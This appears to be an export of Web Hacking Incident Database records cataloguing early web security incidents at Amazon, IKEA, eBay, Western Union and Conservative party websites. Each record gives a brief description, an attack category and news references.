WHID ID: 2000-5
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: View other customers' orders by changing a sequential number within a URL parameter
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1017-245700.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-4: Sensitive files left unprotected on Western Union's Web
WHID ID: 2000-4
Date Occured:
Attack Method:
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description: Sensitive files were left in a publicly accessible directory during a maintenance window
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1023-245525.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-3: Gaffe at Amazon leaves email addresses exposed
WHID ID: 2000-3
Date Occured:
Attack Method: Abuse of Functionality
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description: E-mail addresses of other customers displayed by mistake, no hacking was required
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1017-245387.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-2: IKEA exposes customer information on catalog site
WHID ID: 2000-2
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: Error message revealed a database file location, which could be downloaded.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1017-245372.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 1999-1: eBay downplays security hole
WHID ID: 1999-1
Date Occured: 4/4/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description: A very early XSS issue at eBay. Interesting historically as it seems that at the time the term XSS was not yet in use.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://packetstormsecurity.org/9904-exploits/ebayla.txt
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: Conservative party web CMS system hacked
WHID ID:
Date Occured: 10/16/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: United Kingdom
Incident Description: A SQL injection flaw in the CMS system allowed admin access to many smaller individual and regional Conservative party web sites (the main site www.conservatives.com was unaffected). The password field of the CMS login page was susceptible to SQL injection, allowing access to arbitrary user accounts including the CMS administrator account. The CMS controlled the content of a number of sites run by the Conservative party, many of which are used by regional party groups. The websites have remained down since the attack, including: http://www.bathconservatives.com/, http://www.newtonabbotconservatives.org.uk/, http://www.nwdurhamconservatives.com/ and http://www.nwnorfolkconservatives.com/. Details of the flaw were posted on several message boards, and rapid and widespread defacement occurred, ranging from political satire to hate speech.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected: 20
Reference: http://editor.conservatives.org.uk/cms/v6/cms.admin.php
Attack Source Geography: Multiple sources
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: